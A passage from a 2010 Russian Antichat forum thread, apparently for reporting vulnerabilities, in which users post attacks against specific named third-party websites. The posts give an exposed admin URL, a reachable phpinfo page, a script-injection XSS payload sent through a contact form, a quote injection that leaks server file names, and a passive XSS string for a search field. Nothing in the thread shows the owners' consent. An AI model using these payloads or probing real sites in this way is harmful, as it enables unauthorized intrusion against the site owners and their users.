HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Этичный хакинг или пентестинг > Проверка на уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 17.03.2010, 13:13
karakurtkoss
Новичок
Регистрация: 16.03.2010
Сообщений: 1
С нами: 8504015

Репутация: 0
По умолчанию

http://bws.net.ru/?nvg=/admin
И все становится явным)
 
Ответить с цитированием

  #12  
Старый 17.03.2010, 17:47
shell_c0de
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
С нами: 8866466

Репутация: 564
По умолчанию

http://bws.net.ru/?com=phpinfo
не дефейсните же =\
 
Ответить с цитированием

  #13  
Старый 23.03.2010, 05:20
AKYLA
Участник форума
Регистрация: 29.11.2007
Сообщений: 116
С нами: 9709737

Репутация: 88
По умолчанию

XSS
Пост запрос
http://bws.net.ru:80/?nvg=office:contacts
Цитата:
msg=12345</textarea><script>alert(12345);</script>
 
Ответить с цитированием

  #14  
Старый 24.03.2010, 17:48
b82a
Участник форума
Регистрация: 07.02.2010
Сообщений: 111
С нами: 8556372

Репутация: 127
По умолчанию

http://bws.net.ru/?nvg=office%27

Подставляем кавычку, получаем:
Цитата:
Страницы: 1, main1.htm, main2, main3, main4, main5, order-ru.txt, order.txt, partner1, partner1.htm, paym0.txt, paym1.txt, portfolio1, services1, services1.htm
 
Ответить с цитированием

  #15  
Старый 17.04.2010, 21:24
life_glider
Познающий
Регистрация: 13.04.2010
Сообщений: 42
С нами: 8463290

Репутация: 81
По умолчанию

PASSIVE XSS
ПОСТ запрос http://aimboss.biz/?nvg=forum:find
в любое поле:
" <script></script> <br
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.